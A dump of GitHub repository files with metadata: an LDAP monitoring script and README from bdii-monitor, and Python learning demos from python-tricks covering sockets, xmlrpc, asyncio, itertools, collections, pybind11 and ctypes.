uncertainty = torch.exp(model(toy_data))\n\n    scatter(uncertainty.data.cpu().numpy())\n\n\nif __name__ == '__main__':\n\n    parser = argparse.ArgumentParser(description='ArgParser')\n    parser.add_argument('--sampling', type=int, default=10,\n                        help='Number of samples')\n    parser.add_argument('--N', type=int, default=20,\n                        help='Number of data points')\n    parser.add_argument('--lr', type=float, default=0.01,\n                        help='Learning rate')\n    parser.add_argument('--batch_size', type=int, default=10,\n                        help='Batch size')\n    parser.add_argument('--epochs', type=int, default=5,\n                        help='Epoch')\n    parser.add_argument('--lam', type=float, default=0.00001,\n                        help='weight for L2 norm')\n    parser.add_argument('--drop_p', type=float, default=0.05,\n                        help='dropout probability')\n    parser.add_argument('--l2', type=float, default=0.1,\n                        help='coefficient used to derive the L2 weight decay')\n    parser.add_argument('--seed', type=int, default=1234,\n                        help='Random seed')\n    parser.add_argument('--use_cuda', action='store_true', default=False,\n                        help='enables CUDA training')\n    args = parser.parse_args()\n    args.cuda = args.use_cuda and torch.cuda.is_available()\n\n    torch.manual_seed(args.seed)\n\n    if args.cuda:\n        torch.cuda.manual_seed(args.seed)\n\n    main(args)\n"
}
] | 14 |
Elwell/bdii-monitor | https://github.com/Elwell/bdii-monitor | d1d5406edda464f1ebac42985ae96f126f3a32c3 | cbf4f364d93d7d384c8d6138e30d324f32edd64e | df41bf0ca5d9c6f8acf35ecc55dc73ccabfb2764 | refs/heads/master | 2016-08-13T00:00:56.719972 | 2013-03-05T11:45:01 | 2013-03-05T11:45:01 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6851785182952881,
"alphanum_fraction": 0.6945546269416809,
"avg_line_length": 39.18840408325195,
"blob_id": "51fb77df8f613d9f3b61eb92df4f44e59b0c4234",
"content_id": "a7427c5118f2e32340c97c63990d660d738edd22",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2773,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 69,
"path": "/ldap-gather.py",
"repo_name": "Elwell/bdii-monitor",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\n\n# Trivial monitoring script to spit out LDAP server performance metrics\n# based on the perl script by Matty < matty91 @ gmail dot com >\n# \n# Licenced under GPL3+\n# Andrew Elwell <[email protected]>\n\nimport ldap\nimport json\nimport argparse\n\n# Usage: ldap-gather.py [ -s server ] [ -p port ] [ -h ] \n# Default to localhost:2170 (normal LDAP users probably want port 387)\nparser = argparse.ArgumentParser(description='Gather LDAP statistics and output as json')\nparser.add_argument('-s', '--server', default='localhost', help='localhost if not specified')\nparser.add_argument('-p', '--port', default=2170, help='2170 if not specified')\nparser.add_argument('-v', '--verbose', help='increase output verbosity', action='store_true')\nargs = parser.parse_args()\n\nif args.verbose:\n print(\"Server: %s Port: %s\\n\" % (args.server, args.port))\n\n\n# Stuff to gather - make tuples of DN dn and attrib to get\nsearchlist = {\n'total_connections':('cn=Total,cn=Connections,cn=Monitor','monitorCounter'),\n'bytes_sent': ('cn=Bytes,cn=Statistics,cn=Monitor','monitorCounter'),\n'completed_operations': ('cn=Operations,cn=Monitor','monitorOpCompleted'),\n'initiated_operations': ('cn=Operations,cn=Monitor','monitorOpInitiated'),\n'referrals_sent': ('cn=Referrals,cn=Statistics,cn=Monitor','monitorCounter'),\n'entries_sent': ('cn=Entries,cn=Statistics,cn=Monitor','monitorCounter'),\n'bind_operations': ('cn=Bind,cn=Operations,cn=Monitor','monitorOpCompleted'),\n'unbind_operations': ('cn=Unbind,cn=Operations,cn=Monitor','monitorOpCompleted'),\n'add_operations': ('cn=Add,cn=Operations,cn=Monitor','monitorOpInitiated'),\n'delete_operations': ('cn=Delete,cn=Operations,cn=Monitor','monitorOpCompleted'),\n'modify_operations': ('cn=Modify,cn=Operations,cn=Monitor','monitorOpCompleted'),\n'compare_operations': ('cn=Compare,cn=Operations,cn=Monitor','monitorOpCompleted'),\n'search_operations': ('cn=Search,cn=Operations,cn=Monitor','monitorOpCompleted'),\n'write_waiters': ('cn=Write,cn=Waiters,cn=Monitor','monitorCounter'),\n'read_waiters': ('cn=Read,cn=Waiters,cn=Monitor','monitorCounter'),\n}\n\n# connect to LDAP server\n\nsummary = {}\n\nconn = ldap.initialize('ldap://%s:%s' % (args.server, args.port))\nconn.simple_bind() # async bind. use simple_bind_s() if you want sync\n\nfor key in searchlist.keys():\n b = searchlist[key][0]\n attr = searchlist[key][1]\n if args.verbose:\n print(\"base: %s Attrib: %s\" % (b,attr))\n\n num = conn.search(b,ldap.SCOPE_BASE,'objectClass=*',[attr,])\n\n try:\n result_type, result_data = conn.result(num, 1)\n # Yes, the nested array is ugly, ugly, ugly. \n if result_type == 101:\n val = int(result_data[0][1].values()[0][0])\n\t summary[key] = val\n \n except:\n print \"oops\"\n\nprint json.dumps(summary)\n"
},
{
"alpha_fraction": 0.646258533000946,
"alphanum_fraction": 0.7026239037513733,
"avg_line_length": 21.369565963745117,
"blob_id": "c877d33ba577f27154d058e8a582ef4b88027d2f",
"content_id": "6a87367543f7d25c8e37ef9dde7a84660924563e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1029,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 46,
"path": "/README.md",
"repo_name": "Elwell/bdii-monitor",
"src_encoding": "UTF-8",
"text": "BDII-Monitor\n============\n\nA trivial set of scripts and utilities to monitor the status of the BDII\nservice[1] used on grid nodes. \n\nSince this is based on openldap, the utilities can be reused for generic LDAP\nmonitoring.\n\n\nGetting Started\n---------------\n\nFirst up, make sure that you enable the built-in monitoring that comes with\nopenldap >= 2.4 - see http://www.openldap.org/doc/admin24/monitoringslapd.html\nfor details.\n\nTo restrict access to the cn=monitor tree, you can either restrict via dn (as\nshown in manpage) or via an IP address range:\n\n````\n database monitor\n access to *\n by peername.ip=128.141.0.0%255.255.0.0 read\n by peername.ip=128.142.0.0%255.255.0.0 read\n by peername.ip=137.138.0.0%255.255.0.0 read\n by * none\n````\n\nJSON Output\n-----------\n\nThe script ldap-gather.py is based on the perl script of the same name \nbut simply outputs json rather than logging to a file. This can then be\nreused by other monitoring scripts\n\n\nLEMON\n-----\n\nTODO - CERN Specific\n\ncollectd\n--------\n\nTODO\n"
}
] | 2 |
binchen15/python-tricks | https://github.com/binchen15/python-tricks | f89283d07d48b9e89074e3b6999d653304b73efd | 84591674c12405f2642d1894eee4882f026a3e76 | d9e89354a0bc62d079298adaeed2890d67e3911e | refs/heads/master | 2022-11-23T18:02:40.263276 | 2020-07-12T21:57:17 | 2020-07-12T21:57:17 | 265,893,992 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6820388436317444,
"alphanum_fraction": 0.6820388436317444,
"avg_line_length": 17.727272033691406,
"blob_id": "5c1c009bc50ec37fe347e521310846d4bcab0ee6",
"content_id": "f1af29f20cd8ed385cc90942902bff7d46f93d0a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 412,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 22,
"path": "/concurrency/async/async_demo3.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "# future can be awaited.\n\n\nimport asyncio\n\n\ndef mark_done(future, result):\n future.set_result(result)\n\n\nasync def main(loop):\n future = asyncio.Future()\n loop.call_soon(mark_done, future, 'result')\n result = await future\n print('returned result: {!r}'.format(result))\n\n\nevent_loop = asyncio.get_event_loop()\ntry:\n event_loop.run_until_complete(main(event_loop))\nfinally:\n event_loop.close()\n"
},
{
"alpha_fraction": 0.5872374773025513,
"alphanum_fraction": 0.625201940536499,
"avg_line_length": 22.320755004882812,
"blob_id": "26af6f9222aa68cbb0fd19beb3719d9057593818",
"content_id": "ea0fb07ffdcad6d0784ee9fae6d03b0ce587f43f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1238,
"license_type": "no_license",
"max_line_length": 150,
"num_lines": 53,
"path": "/pybind/README.md",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "### reference:\n\thttp://people.duke.edu/~ccc14/sta-663-2020/notebooks/S13_pybind11.html\n\thttps://pybind11.readthedocs.io/en/stable/index.html\n\n----------- example.cpp ----------------\n```\n#include <pybind11/pybind11.h>\nnamespace py = pybind11;\n\nint add(int i = 1, int j = 2) {\n return i + j;\n}\n\nPYBIND11_MODULE(example, m) {\n m.doc() = \"pybind11 example\"; // optional module docstring\n\n\tm.def(\"add\", &add, \"A function which adds two numbers\",\n py::arg(\"i\") = 1, py::arg(\"j\") = 2);\n}\n```\n----------------------------------------\n\n#### exporting variables from C++\n\n\tpy::object world = py::cast(\"World\");\n\tm.attr(\"what\") = world;\n\n### build manually on linux\n\n\tc++ -O3 -Wall -shared -std=c++11 -fPIC `python3 -m pybind11 --includes` example.cpp -o example`python3-config --extension-suffix`\n\n### build manually on mac\n\n\tc++ -O3 -Wall -shared -std=c++11 -undefined dynamic_lookup `python3 -m pybind11 --includes` example.cpp -o example`python3-config --extension-suffix`\n\n\tnote the '-undefined dynamic_lookup' extra \n\n### to use cppimport \n\nadd \n\n```\n/* \n<%\nsetup_pybind11(cfg)\n%>\n*/\n```\nto the example.cpp code, then directly import\n\n\timport cppimport\n\texample = cppimport.imp('example') ## build once here.\n\texample.add(3, 5)\n\n\n"
},
{
"alpha_fraction": 0.7095761299133301,
"alphanum_fraction": 0.727629542350769,
"avg_line_length": 24.440000534057617,
"blob_id": "478bd7c957e0dab2165a82b537d092251a85940a",
"content_id": "2ae4fb7b814d31e989c0d6fe43d45a993f440a52",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1274,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 50,
"path": "/sockets/README.md",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "two primary properties\n\taddress family\n\t\tAF_INET\n\t\tAF_INET6\n\t\tAF_UNIX\n\t\t\tfor Unix Domain Socket (UDS)\n\n\tsocket type\n\t\tSOCK_DGRAM\n\t\t\tUDP\n\t\t\t\tUser Datagram Protocol\n\t\t\tTCP\n\t\t\t\tTransmission Control Protocol\n\t\n\timport socket\n\tsocket.gethostname()\n\tsocket.gethostbyname()\n\tsocket.gethostbyname_ex()\t\n\tsocket.getfqdn()\n\t\thostname, aliases, addresses = \n\tsocket.gethostbyaddr('10.9.0.10')\n\nservice information\n\n\tThe combination of IP address, protocol, and port number uniquely identify a \n\tcommunication channel and ensure that messages sent through a socket arrive \n\tat the correct destination.\n\n\n\tIn [2]: socket.getservbyport(443) Out[2]: 'https'\n\n\nTCP/IP Client and Server\n\n\tstream oriented protocol\n\nUser Datagram Client and server\n\t\n\tmessage oriented protocol\n\n\tUDP messages must fit within a single datagram (for IPv4, \n\tthat means they can only hold 65,507 bytes because the 65,535 byte \n\tpacket also includes header information) and delivery is not \n\tguaranteed as it is with TCP.\n\nUnix Domain Socket\n\n\tthe address of the socket is a path on the file system\n\tthe node created in the file system to represent the socket persists \n\t after the socket is closed, and needs to be removed each time the server starts up\n\n\n"
},
{
"alpha_fraction": 0.7371794581413269,
"alphanum_fraction": 0.7628205418586731,
"avg_line_length": 30.200000762939453,
"blob_id": "5011f5203b32ddd95c6bead325af36c2c7b99d49",
"content_id": "36afcc89ab3925abbf6faa936904ad20f1067af0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 156,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 5,
"path": "/xmlrpc/example2/client.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "import xmlrpc.client\n\nproxy = xmlrpc.client.ServerProxy('http://localhost:6789')\n# namespace allowed. concept of service tree\nprint(proxy.dir.list('/tmp'))\n"
},
{
"alpha_fraction": 0.6209476590156555,
"alphanum_fraction": 0.6408977508544922,
"avg_line_length": 22.58823585510254,
"blob_id": "4b9afa76db798bd5979a8925e08502ee99eb39cb",
"content_id": "06846abc4df208d5b0dbdec2fe334b0ad07288b6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 401,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 17,
"path": "/sockets/tcp/client.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "import socket\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.connect(('localhost', 10000))\n\nmessage = b'This is the message. It will be echoed from the server.'\n\ntry:\n sock.sendall(message)\n counts = 0\n amount = len(message)\n while counts < amount:\n chunk = sock.recv(16)\n counts += len(chunk)\n print(\"Got {}\".format(chunk))\nfinally:\n sock.close()\n"
},
{
"alpha_fraction": 0.6193474531173706,
"alphanum_fraction": 0.657698929309845,
"avg_line_length": 21.973684310913086,
"blob_id": "0cafe31657cd1efb4494a40bbd9d99d3c61b0c30",
"content_id": "8af51a7a4b947d2b20a2578b90e42a08eae6c50d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1747,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 76,
"path": "/itertools_demo/iter_demo_general.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "# ref: https://pymotw.com/\n\nimport itertools as it\nimport operator as op \n\ndata = [1,2,3,4,5]\nresult = it.accumulate(data, op.mul)\nprint(list(result))\n\ndata = [1,1,2]\nresult = it.combinations(data, 2)\nprint(list(result))\n\n\nresult = it.combinations_with_replacement(data, 2)\nprint(list(result))\n\n# it.cycle\nresult = it.cycle([1,-1])\n\n# chain\n#it.chain(*iterables)\n\n# it.filterfalse(predicate, iterable)\n# return the false ones\n\n# itertools.islice(iterable, start, stop[, step])\n# return an iterable, not copy part of array\nresult = it.islice(range(10), 3)\nprint(list(result))\n\n# itertools.permutations(iterable, r=None)\nresult = it.permutations(range(3), 2)\nprint(list(result))\n\n# product\nresult = it.product(range(3), 'abc')\nprint(list(result))\n\n# repeat(object[, ntimes])\nresult = it.repeat('abc', 3)\nprint(list(result))\n\n# starmap op.mul(*[2,6])\ndata = [(2, 6), (8, 4), (7, 3)]\nresult = it.starmap(op.mul, data)\nfor each in result:\n print(each)\n\n# it.takewhile (only 1 cut)\ndata = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 1]\nresult = it.takewhile(lambda x: x<5, data)\nfor each in result:\n print(each)\n\n# it.dropwhile (only 1 cut)\ndata = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 1]\nresult = it.dropwhile(lambda x: x<5, data)\nfor each in result:\n print(each)\n\n# itertools.tee(iterable, n=2)\n# return n independent iterators for iterable given\ncolors = ['red', 'orange', 'yellow', 'green', 'blue']\nalpha_colors, beta_colors = it.tee(colors)\nfor each in alpha_colors:\n print(each)\nprint('..')\nfor each in beta_colors:\n print(each)\n\n# it.zip_longest(*iterables, fillvalue=None)\ncolors = ['red', 'orange', 'yellow', 'green', 'blue',]\ndata = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10,]\nfor each in it.zip_longest(colors, data, fillvalue=None):\n print(each)\n\n"
},
{
"alpha_fraction": 0.5886426568031311,
"alphanum_fraction": 0.5886426568031311,
"avg_line_length": 23,
"blob_id": "607d0a2e223d92f37314e01919577e5b4bd78290",
"content_id": "b97bb7327937f076515133bea4fe88fb8d84ce8f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 722,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 30,
"path": "/itertools_demo/iter_demo_groupby.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "import itertools as it\n\nrobots = [{\n 'name': 'blaster',\n 'faction': 'autobot'\n}, {\n 'name': 'galvatron',\n 'faction': 'decepticon'\n}, {\n 'name': 'jazz',\n 'faction': 'autobot'\n}, {\n 'name': 'metroplex',\n 'faction': 'autobot'\n}, {\n 'name': 'megatron',\n 'faction': 'decepticon'\n}, {\n 'name': 'starcream',\n 'faction': 'decepticon'\n}]\n\nprint(\"before sorting, not you expected:\")\nfor key, grouper in it.groupby(robots, key=lambda x: x['faction']):\n print(f\" {key}=>{list(grouper)}\")\n\nprint(\"after in-place sorting, you get what you want:\")\nrobots.sort(key=lambda x: x['faction'])\nfor key, grouper in it.groupby(robots, key=lambda x: x['faction']):\n print(f\" {key}=>{list(grouper)}\")\n\n\n"
},
{
"alpha_fraction": 0.497854083776474,
"alphanum_fraction": 0.520386278629303,
"avg_line_length": 28.03125,
"blob_id": "cce396774ce09726beb8eebf15abe1f93eb40f0d",
"content_id": "f411d70708e287323842f668e21d1199ba442f53",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 932,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 32,
"path": "/collections_demo/demo_Counter.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "from collections import Counter\n\nc = Counter(\"Hello World!\")\nprint(c)\n\ns = 'the lazy dog jumped over another lazy dog' \nc = Counter(s.split(\" \")) \nprint(c.most_common(3))\nprint(c.most_common()) \n\nc = Counter(a=3,b=5,e=2) \nprint(c.most_common()) \n\nc = Counter({\"a\":3, \"b\":4, \"e\":2}) \nprint(c.most_common()) \nc.elements() \n# <itertools.chain at 0x10e6ac860>\n\nc = Counter(dict([(\"a\",3),(\"b\",4),(\"e\",2)])) # convert from a list of(elem, cnt) \nprint(c)\n\n\nsum(c.values()) # total of all counts \nlist(c) # list unique elements \nset(c) # convert to a set \ndict(c) # convert to a regular dictionary \nc.items() # convert to a list like (elem, cnt) \nc.clear() # reset all counts \n\nc = Counter({\"a\":3, \"b\":4, \"e\":2, \"f\":-2})\nc += Counter() # remove zero and negative counts\nprint(c)\n\n\n\n"
},
{
"alpha_fraction": 0.6647230386734009,
"alphanum_fraction": 0.6763848662376404,
"avg_line_length": 23.5,
"blob_id": "73baba321b5638664b2a9cd9db498a4466733d39",
"content_id": "b2b5473caf1ec24d5d9734a56da695f4642d06a5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 343,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 14,
"path": "/xmlrpc/example3/client.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "import xmlrpc.client\n\nproxy = xmlrpc.client.ServerProxy('http://localhost:9000')\nprint('public():', proxy.service.public())\n\ntry:\n print('private():', proxy.service.private())\nexcept Exception as err:\n print('\\nERROR:', err)\n\ntry:\n print('public() without prefix:', proxy.public())\nexcept Exception as err:\n print('\\nERROR:', err)\n"
},
{
"alpha_fraction": 0.6375464797019958,
"alphanum_fraction": 0.6710036993026733,
"avg_line_length": 17.482759475708008,
"blob_id": "860d9f5d5ff12286a25330eee6813ab7570ee6e9",
"content_id": "167134cf73c2d1f3c7a18f35192a2d830bb1c9e1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 538,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 29,
"path": "/collections_demo/demo_deque.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "# deqeue --- Double-Ended Queue\n\nfrom collections import deque\n\n# .append, .appendleft\n# .extend, .extendleft\n\n# Add to the right\nd1 = deque()\nd1.extend('abcdefg')\nprint('extend :', d1)\nd1.append('h')\nprint('append :', d1)\n\n# Add to the left\nd2 = deque()\nd2.extendleft(range(6))\nprint('extendleft:', d2)\nd2.appendleft(6)\nprint('appendleft:', d2)\n\n# deque can be rotated left, right\nd = collections.deque(range(10))\nd.rotate(2)\nprint('Right rotation:', d)\n\nd = collections.deque(range(10))\nd.rotate(-2)\nprint('Left rotation :', d)\n\n\n"
},
{
"alpha_fraction": 0.6895787119865417,
"alphanum_fraction": 0.7028824687004089,
"avg_line_length": 29,
"blob_id": "9bd186c344342ee48762c8da440b7f23c2214751",
"content_id": "3f1081a530fc41d6b9daac634817a87d911c1aa1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 451,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 15,
"path": "/collections_demo/demo_OrderedDict.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "from collections import OrderedDict\n#dict subclass that remembers the order in which that keys were first inserted.\n\n# order is not sort.\n# it can be used in conjunction with sorting to make a sorted dictionary\n\nd = {'banana': 3, 'apple': 4, 'pear': 1, 'orange': 2}\n\nprint(\"order by name\")\nod = OrderedDict(sorted(d.items(), key=lambda x : x[0]))\nprint(od)\n\nprint('order by values')\nod = OrderedDict(sorted(d.items(), key=lambda x : x[1]))\nprint(od)\n\n"
},
{
"alpha_fraction": 0.7080891132354736,
"alphanum_fraction": 0.7245017290115356,
"avg_line_length": 21.421052932739258,
"blob_id": "fde5a1ce760272d72e180f2bc2f84392096ae50d",
"content_id": "29d34423587679a56f2e8d67c1b4b0d42aefac3d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 853,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 38,
"path": "/xmlrpc/README.md",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "**python3 only**\n\n#### refer to https://pymotw.com/3/xmlrpc.server/index.html\n\n\txmlrpc.client.ServerProxy('http://localhost:9000', verbose=True)\n\tallow_none=False\n\t\tNone -> Nil\n\tuse_datetime=True\n\tobject sent as dictory\n\t\tuse pickle as an alternative\n\n### example 1\n\tregister_function\n\n### example 2\n\tregister_instance (class instance)\n\n### example 3\n\tregister_isntance with _dispatch logic, to protect methods in classes.\n\n### multicall wrapper extension\n\n```\nimport xmlrpc.client\nserver = xmlrpc.client.ServerProxy('http://localhost:9000')\n\nmulticall = xmlrpc.client.MultiCall(server)\nmulticall.ping()\nmulticall.show_type(1)\nmulticall.raises_exception('Next to last call stops execution')\nmulticall.show_type('string')\n\ntry:\n for i, r in enumerate(multicall()):\n print(i, r)\nexcept xmlrpc.client.Fault as err:\n print('ERROR:', err)\n````\n\n"
},
{
"alpha_fraction": 0.6349431872367859,
"alphanum_fraction": 0.6420454382896423,
"avg_line_length": 22.46666717529297,
"blob_id": "9f5e8760eda3f2336840c67146c74ff6df4da043",
"content_id": "1439409eb6f2f3f3e19d49d4fea77cd98b05a1cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 708,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 30,
"path": "/collections_demo/demo_ChainMap.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "# The ChainMap class manages a sequence of dictionaries, \n# + and searches through them in the order they are given to find values by keys. \n# A ChainMap makes a good “context” container, since it can be treated as a stack for \n# + which changes happen as the stack grows, with these changes being discarded again \n# + as the stack shrinks.\n\nfrom collections import ChainMap\n\na = {'a': 'A', 'c': 'C'}\nb = {'b': 'B', 'c': 'D'}\n\nm = ChainMap(a, b)\n\nprint(m.maps)\nprint('c = {}'.format(m['c']))\n\n# reverse the list\nm.maps = list(reversed(m.maps))\n\nprint(m.maps)\nprint('c = {}'.format(m['c']))\n\n# new_child()\nm2 = m.new_child()\nm2['c'] = \"E\"\nprint(m2.maps)\n\nc = {'c': 'E'}\nm3 = m.new_child(c)\nprint(m3.maps)\n"
},
{
"alpha_fraction": 0.5671641826629639,
"alphanum_fraction": 0.5671641826629639,
"avg_line_length": 15.75,
"blob_id": "70e391314a784eeeb7f9906fa8138c6dbb7ae5ca",
"content_id": "85ebe5916cc5271eec01833a6ca63f4cb99a89b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 134,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 8,
"path": "/ffi/ctypes_demo/example2/Makefile",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "libline.so: point.o line.o\n\tgcc -shared $^ -o $@\n\nlibpoint.so: point.o\n\tgcc -shared $^ -o $@\n\n%.o: %.c\n\tgcc -c -Wall -Werror -fpic $^\n"
},
{
"alpha_fraction": 0.5646359324455261,
"alphanum_fraction": 0.570579469203949,
"avg_line_length": 21.399999618530273,
"blob_id": "46301837c54eba0a7fa8c98059e3d5d03e498ea5",
"content_id": "81186904fa47b5adcebd1ee9acb86a526ed7109f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 673,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 30,
"path": "/sockets/uds/server.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "import socket\nimport os\n\nsock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\naddr = \"./uds_socket\"\n\n# addr must be cleared before server start listening\ntry:\n os.unlink(addr)\nexcept OSError:\n if os.path.exists(addr):\n raise\n\nsock.bind(addr)\nsock.listen(1) # only 1 connection\n\nwhile True:\n conn, client_addr = sock.accept()\n print(\"client address: {}\".format(client_addr))\n try:\n while True:\n chunk = conn.recv(16)\n print('Received: {}'.format(chunk))\n if chunk:\n conn.sendall(chunk)\n else:\n print(\"Done!\")\n break\n finally:\n conn.close()\n\n"
},
{
"alpha_fraction": 0.6376237869262695,
"alphanum_fraction": 0.6435643434524536,
"avg_line_length": 25.578947067260742,
"blob_id": "81b164bd28736efba93d7c2ea3c70ceeddc79809",
"content_id": "33eaf980c556641bf522e29a6b4591573d8fbbd7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 505,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 19,
"path": "/concurrency/threading_demo4.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "import logging\nimport time\nfrom concurrent.futures import ThreadPoolExecutor\n\n\ndef job(name):\n logging.info(f\"thread {name} starting\")\n time.sleep(1)\n logging.info(f\"thread {name} finished\")\n\n\nif __name__ == \"__main__\":\n format = \"%(asctime)s: %(message)s\"\n logging.basicConfig(format=format, level=logging.INFO,\n datefmt=\"%H:%M:%S\")\n\n # context manager will call .join()\n with ThreadPoolExecutor(max_workers=3) as executor:\n executor.map(job, range(6))\n"
},
{
"alpha_fraction": 0.6732673048973083,
"alphanum_fraction": 0.6732673048973083,
"avg_line_length": 19.200000762939453,
"blob_id": "f3a728054c319cbb548070fe58ad312590bcce33",
"content_id": "87e626a1cab01b6ace2d138988784e63f723565c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 101,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 5,
"path": "/ffi/ctypes_demo/example1/Makefile",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "clib.so: clib.o\n\tgcc -shared -o libclib.so clib.o\n\nclib.o: clib.c\n\tgcc -c -Wall -Werror -fpic clib.c\n"
},
{
"alpha_fraction": 0.525896430015564,
"alphanum_fraction": 0.5657370686531067,
"avg_line_length": 18.230770111083984,
"blob_id": "32022a2bc9a3116286081e398eac83276dd8e5a4",
"content_id": "7ed00b2080a51b318af2e0415430fba4be629a2e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 251,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 13,
"path": "/pybind/examples/ex2/example.cpp",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "\n// file example.cpp\n/*\n<%\nsetup_pybind11(cfg)\n%>\n*/\n#include <pybind11/pybind11.h>\nnamespace py = pybind11;\n\nPYBIND11_MODULE(example, m) {\n m.def(\"add\", [](int a, int b) { return a + b; });\n m.def(\"mult\", [](int a, int b) { return a * b; });\n}\n"
},
{
"alpha_fraction": 0.7169811129570007,
"alphanum_fraction": 0.7169811129570007,
"avg_line_length": 18.272727966308594,
"blob_id": "d44928950ad29ae64672322ccabe3de3f5a1a82f",
"content_id": "f519d957e67c4cf9a7e2d545c27956ad93d30262",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 212,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 11,
"path": "/collections_demo/demo_defaultdict.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "from collections import defaultdict\n\n# first argument must be callable or None\nwc = defaultdict(int)\nprint(wc['hello'])\n\ndd = defaultdict(list)\nprint(dd)\ndd['a'].append(\"Hello\")\ndd['a'].append(\"World\")\nprint(dd)\n"
},
{
"alpha_fraction": 0.6241496801376343,
"alphanum_fraction": 0.6352040767669678,
"avg_line_length": 27.682926177978516,
"blob_id": "84ca4c59435042d17a6487f6263599e499b04fc5",
"content_id": "e54185eed085803ba5820e6c1ec73af5ec26c622",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1176,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 41,
"path": "/concurrency/threading_demo7.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
